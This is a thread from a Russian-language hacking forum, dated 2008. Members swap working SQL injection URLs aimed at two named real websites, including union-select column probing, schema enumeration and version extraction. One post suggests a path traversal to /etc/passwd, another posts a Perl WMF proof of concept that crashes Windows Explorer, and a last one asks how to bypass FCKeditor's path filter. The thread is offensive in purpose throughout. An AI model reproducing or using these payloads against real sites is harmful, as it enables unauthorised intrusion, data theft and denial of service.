 |
|
11.01.2008, 23:06
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
С нами:
10143866
Репутация:
201
|
|
это инклуд или читалка файлов.
попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
и почитай статьи на эту тему
|
|
|
12.01.2008, 03:28
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*
P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
__________________________________________________ _______________________
http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*
Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
|
|
|
|
12.01.2008, 03:36
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
С нами:
10669286
Репутация:
1942
|
|
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+mysql.pb_ta ble/*
P.S. пробывал users,user---не катит.Или в запросе ошибка,или он блочит от него всё.Но бадяга же должна быть)(
невоткнул где вывод, но есть схема таблес:
http://www.paintball.ru/next.php?id=19+union+select+0,1,2+from+information _schema.tables/*
http://www.happyland-drink.ru/brands.php?id=2+union+select+0,1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28/*
Та же бредятина--- больше одного поля-ошибка в селекте,меньше на один,тоже ошибка.Знач,прально.И при выборе всей этой байды не показывается ничего: )
надо просто было подставить нге существующий id.
вот: 4твёртая версия, дальше уж подбирай.
http://www.happyland-drink.ru/brands.php?id=-2+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,%2027, 28/*
|
|
|
|
12.01.2008, 03:42
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами:
10263386
Репутация:
849
|
|
http://www.paintball.ru/next.php?id=19+or+1=1
там где чувак с ружом
Последний раз редактировалось Basurman; 12.01.2008 в 03:45..
|
|
|
|
12.01.2008, 03:43
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
С нами:
9650471
Репутация:
-2
|
|
Сообщение от V1k
это инклуд или читалка файлов.
попробуй вместо "union select null,null/*" подставить "../../../../../../../../etc/passwd%00"
и почитай статьи на эту тему
Можешь ссылку дать,а то я чет не нахожу)(наверн потому,что спать хчу  )
|
|
|
|
12.01.2008, 13:22
|
|
Познающий
Регистрация: 19.02.2007
Сообщений: 47
С нами:
10118127
Репутация:
6
|
|
Сильно не пинайте знатоки, лучше подскажите и научите нашел вот такое
Такой себе простенький сплоет убивающий explorer.exe.. локальный. Компилится под перлом. После компиляции создается файл *.wmf в директории. При просмотре директории с этим файлом ехплорер зависает...
Вот код:
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\ x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\ x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\ x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait  \n";
# milw0rm.com научите как правильно его запустить и можно ли сделать чтоб он сам запускался? |
|
|
|
12.01.2008, 14:10
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
юзай мета сплойт.
выбирай шелкод, генерируй сплойт и работай в разделе статьи есть на эту тему.
|
|
|
|
12.01.2008, 14:23
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
С нами:
10226273
Репутация:
370
|
|
STUDENTIK
Для начала поставь сеье Perl. Потом просо в командной строке пиши perl путь_до_скрипта
А вообще поставб себе локальный сервер, типа Denwer - пригодится.
|
|
|
|
12.01.2008, 21:34
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
Здравствуйте!
Подскажите, как обойти фильтрацию двойных точек в относительном пути:
есть php-код (upload.php редактора fckeditor):
Код:
$sCurrentFolder = $_GET['CurrentFolder'] ;
if ( strpos( $sCurrentFolder, '..' ) ) SendError( 102, "" ) ;
где CurrentFolder хочу поставить '../../../' вместо '/'
Спасибо! |
|
|
|
12.01.2008, 21:39
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Никак
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
